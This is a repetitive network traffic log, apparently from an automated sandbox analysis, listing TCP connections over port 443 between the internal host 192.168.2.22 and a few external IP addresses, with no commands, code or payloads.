Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
Source: global traffic	TCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
